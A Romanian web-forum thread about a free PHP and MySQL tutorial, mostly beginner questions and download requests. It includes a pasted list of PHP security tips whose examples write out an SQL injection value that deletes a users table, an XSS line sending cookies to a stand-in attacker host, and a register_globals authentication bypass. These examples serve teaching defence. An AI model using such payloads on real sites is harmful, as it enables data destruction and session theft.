Tutorial PHP & MySQL in limba Romana
Last Updated: Mar 19 2011 16:49, Started by
orice_on
, Jun 01 2005 14:03
·
0
#163
Posted 06 November 2007 - 17:56
darkangelbv, on Nov 6 2007, 17:44, said: pentru ca tu ai salvat fisierul de tip text in Notepad... Cand salvezi, la file type pui "All files" in loc de "Text file" Dap, asa e....iti multumesc! Lool...imi apare pagina alba...@_@ Edited by Sorin16, 06 November 2007 - 17:57. |
#164
Posted 06 November 2007 - 19:48
#165
Posted 11 November 2007 - 17:12
<! DOCTYPE html PUBLIC "-//W3C//DTD XHTML1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1 - transitional.DTD"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content"=text/html; charset= iso-8859-1"/> <title> Bine ai venit</title> </head> <body> <? php // Script 2.3 - variabile.php // O adresa: $strada = "Iuliu Maniu"; $oras = "Bucuresti"; $stat = "Romania"; $codul_postal = 1100821; // Afiseaza adresa print "The adress is: <br />$strada <br />$oras $stat $codul_postal"; ?> </body> </html> Ce gresesc aici....e un exemplu dintr-o carte...:| |
#166
Posted 18 November 2007 - 14:47
Sorin16, on Nov 11 2007, 17:12, said: <! DOCTYPE html PUBLIC "-//W3C//DTD XHTML1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1 - transitional.DTD"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content"=text/html; charset= iso-8859-1"/> <title> Bine ai venit</title> </head> <body> <? php // Script 2.3 - variabile.php // O adresa: $strada = "Iuliu Maniu"; $oras = "Bucuresti"; $stat = "Romania"; $codul_postal = 1100821; // Afiseaza adresa print "The adress is: <br />$strada <br />$oras $stat $codul_postal"; ?> </body> </html> Ce gresesc aici....e un exemplu dintr-o carte...:| <? php se scrie legat <?php |
#167
Posted 19 November 2007 - 18:11
#168
Posted 23 November 2007 - 18:54
Wow... am citit tot ce era de citit pe aici, mi-a sunat foarte bine si am vrut sa citesc si eu acel "manual", am intrat ca omul pe site si am vazut acolo scris, mare si colorat "TUTORIAL" si surpriza "Linkul este dezactivat" . Ma poate ajuta cineva si pe mine cu cea mai noua versiune a acestui tutorial pe care o mai aveti prin calculator?
Multumesc. Edited by Dreak, 23 November 2007 - 18:55. |
#169
Posted 26 December 2007 - 20:40
se anunta ca apare versiunea 3 cu tutoriale video.
S-a abandonat proiectul? |
#171
Posted 01 February 2008 - 12:30
Are cineva prin calculator ultima versiune a acestui tutorial 2.2 ( parca ) ? Pentru ca n-o mai gasesc nicaieri disponibila pentru download. Multumesc anticipat !
|
#172
Posted 26 February 2008 - 17:19
frate esti cel mai tare ...
mortii astia de la facultatea de mate-info din constanta .... iti folosesc tutorialul cand preda la elevi... deci eu dau 18 milioane pe an pe facultate sa ma invete dupa tutorialul unui om ... profesorii sunt sub orice critica de prosti! |
|
#173
Posted 26 February 2008 - 20:23
cipcip, on Feb 26 2008, 17:19, said: deci eu dau 18 milioane pe an pe facultate sa ma invete dupa tutorialul unui om ... profesorii sunt sub orice critica de prosti! |
#174
Posted 05 May 2008 - 14:03
cand oriceon (autorul) o sa il faca public, o sa il puteti lua (de pe site-ul lui). pina atunci sa nu vad postate pe aici link-uri catre diverse locatii ca respectivii se vor alege cu un suspend de 3 zile.
chiar daca tutorialul este free, daca autorul a decis sa nu il faca public pe propriul lui site, atunci decizia lui va fi respectata si aici. iar cererile pe topic vor fi sterse fara nici o notificare. Edited by ciuly, 05 May 2008 - 14:04. |
#175
Posted 18 September 2008 - 19:10
Am reactivat link-ul de download in site pana cand imi fac putin timp liber si scap de povara asta de a muncii non stop :| Imi cer scuze pentru cei ce inca asteapta v3.
So puteti intra iar pe http://www.oriceon.com/ si veti gasi iar link de download. Edited by orice_on, 18 September 2008 - 19:11. |
#176
Posted 19 September 2008 - 13:29
PHP MySQL Web Development Security Tips - 14 tips you should know when developing with PHP and MySQL
I read about many of these points in books and tutorials but I was rather lazy to think about many of them initially learned some of these lessons the hard way. Fortunately I didn't lose any major data over security issues with PHP MySQL, but my suggestion to everyone who is new to PHP is to read these tips and apply them *before* you end up with a big mess. 1. Do not trust user input If you are expecting an integer call intval() (or use cast) or if you don't expect a username to have a dash (-) in it, check it with strstr() and prompt the user that this username is not valid. Here is an example: PHP Code: $post_id = intval($_GET['post_id']); mysql_query("SELECT * FROM post WHERE id = $post_id"); Now $post_id will be an integer for sure 2. Validate user input on the server side If you are validating user input with Javascript, be sure to do it on the server side too, because for bypassing your Javascript validation a user just needs to turn their Javascript off. Javascript validation is only good to reduce the server load. 3. Do not use user input directly in your SQL queries Use mysql_real_escape_string() to escape the user input. PHP.net recommends this function: (well a little different) PHP Code: function escape($values) { if(is_array($values)) { $values = array_map(array(&$this, 'escape'), $values); } else { /* Quote if not integer */ if ( !is_numeric($values) || $values{0} == '0' ) { $values = "'" .mysql_real_escape_string($values) . "'"; } } return $values; } Then you can use it like this: PHP Code: $username = escape($_POST['username']); mysql_query("SELECT * FROM user WHERE username = $username"); /* escape() will also adds quotes to strings automatically */ 4. In your SQL queries don't put integers in quotes For example $id is suppose to be an integer: PHP Code: $id = "0; DELETE FROM users"; $id = mysql_real_escape_string($id); // 0; DELETE FROM users - mysql_real_escape_string doesn't escape ; mysql_query("SELECT * FROM users WHERE id='$id'"); Note that, using intval() would fix the problem here. 5. Always escape the output This will prevent XSS (Cross Site Scripting) attacks, imagine you receive and save some data from a user and you want to display this data on a web page later (maybe his/her bio or username) and the user puts this bit of code in the input field along with his bio: [code] <script>alert('');</script> [code] If you display the raw user input on a web page this will be very ugly, it can even be worse if a user inputs this code instead: Code: <script>document.location.replace('http://attacker/?c=...document.cookie);</script> With this, an attacker can steal cookies from whoever visits that certain page (containing bio etc.) and this includes session cookies with session IDs in them so the attacker can hijack your users' sessions and appear to be logged in as other users. When displaying user input on a page use htmlentities($user_bio, ENT_QUOTES, 'UTF-8'); 6. When uploading files, validate the file mime type If you are expecting images, make sure the file you are receiving is an image or it might be a PHP script that can run on your server and does whatever damage you can imagine. One quick way is to check the file extension: PHP Code: $valid_extensions = array('jpg', 'gif', 'png'); // ... $file_name = basename($_FILES['userfile']['name']); $_file_name = explode('.', $file_name); $ext = $_file_name[ count($_file_name) - 1 ]; if( !in_array($ext, $valid_extensions) ) { /* This file is invalid */ } Note that validating extension is a very simple way, and not the best way, to validate file uploads but it's effective; simply because unless you have set your server to interpret .jpg files as PHP scripts then you are fine. 7. If you are using 3rd party code libraries, be sure to keep them up to date If you are using code libraries like Smarty or ADODB etc. be sure to always download the latest version. 8. Give your database users just enough permissions If a database user is never going to drop tables, then when creating that user don't give it drop table permissions, normally just SELECT, UPDATE, DELETE, INSERT should be enough. 9. Do not allow hosts other than localhost to connect to your database If you need to, add only that particular host or IP as necessary but never, ever let everyone connect to your database server. 10. Your library file extensions should be PHP .inc files will be written to the browser just like text files (unless your server is setup to interpret them as PHP scripts), users will be able to see your messy code (kidding ) and possibly find exploits or see your passwords etc. Have extensions like config.inc.php or have a .htaccess file in your extension (templates, libs etc.) folders with this one line: Code: deny from all 11. Have register globals off or define your variables first Register globals can be very dangerous, consider this bit of code: PHP Code: if( user_logged_in() ) { $auth = true; } if( $auth ) { /* Do some admin stuff */ } Now with register globals on an attacker can view this page like this and bypass your authentication: http://yourwebsite.c...dmin.php?auth=1 If you have registered globals on and you can't turn it off for some reason you can fix these issues by defining your variables first: PHP Code: $auth = false; if( user_logged_in() ) { $auth = true; } if( $auth ) { /* Do some admin stuff */ } Defining your variables first is a good programming practice that I suggest you follow anyway. 12. Keep PHP itself up to date Just take a look at www.php.net and see release announcements and note how many security issues they fix on every release to understand why this is important. 13. Read security books Always find new books about PHP security to read; you can start by reading the 4th book in the PHP Thread, which is one of the best books on PHP security and the author is a member of the PHP team so he knows the internals very well.
Edited by ciuly, 19 September 2008 - 13:54.
|
#177
Posted 09 October 2008 - 23:08
Mie imi place tare mult o sa il folosesc si chiar ma gandesc sa particip cu ceva.
Oriceon astept un pm sau ceva pe mess sa vedem poate dezvoltam ideea. Cat despre program too late done already hai cu un pm si poate vrei sa il testezi. Cu stima domnilor. |
|
#178
Posted 28 August 2009 - 20:07
e foarte tare pentru un incepator ca mine insa toti asteptam versiunea 3.0 si poate adaugi si cum sa adaugi optiunea search pe site poate asa aflu si eu tot respectul
|
#179
Posted 28 August 2009 - 20:31
Oare s-a mai spus aici de http://www.programar...are.org_php.pdf de la Programare.org, tot in romaneste? Acest tutorial o sa fie updatat in curind, o sa anunt aici cind e gata noua versiune.
|
#180
Posted 23 November 2009 - 20:22
orice_on, on 15th July 2007, 17:29, said: De când tot zic că o să mă întorc ... parcă mi-e și rușine de mine. Mă rog, ideea e că stau foarte prost cu timpul și nu prea fac fața problemelor personale. Știți cum e când lucrezi undeva, când vii seara acasă și când mai ai și o prietenă (dacă aș mai fii avut și copii, nu știu ce m-aș fii facut ). Cu toate astea, am luat o hotărâre, și anume aceea de a scoate și un tutorial de Javascript, imediat după ce-l voi termina pe acesta. Tot odată țin să anunț că versiunea 3.0 va fii ultima din ciclul "Inițiere în PHP și MySQL", desigur, o veți putea descărca-o gratuit de pe același website http://www.oriceon.com În speranța că nu mă urâți așa tare, cu stimă, Valentin Ivașcu (oriceon). Salut, Sunt nou pe acest forum si incepator pe deasupra; Am incercat sa downloadez tutorialul lui Valentin de la adresa www.oriceon.com, l-am downloadat insa nu pot sa deschid pdf-ul; Primesc urmatorul mesaj : "An internal error occurred" Ma puteti ajuta va rog cu un sfat ca sa pot deschide pdf-ul? Multumesc |
Anunturi
Bun venit pe Forumul Softpedia!
▶ 0 user(s) are reading this topic
0 members, 0 guests, 0 anonymous users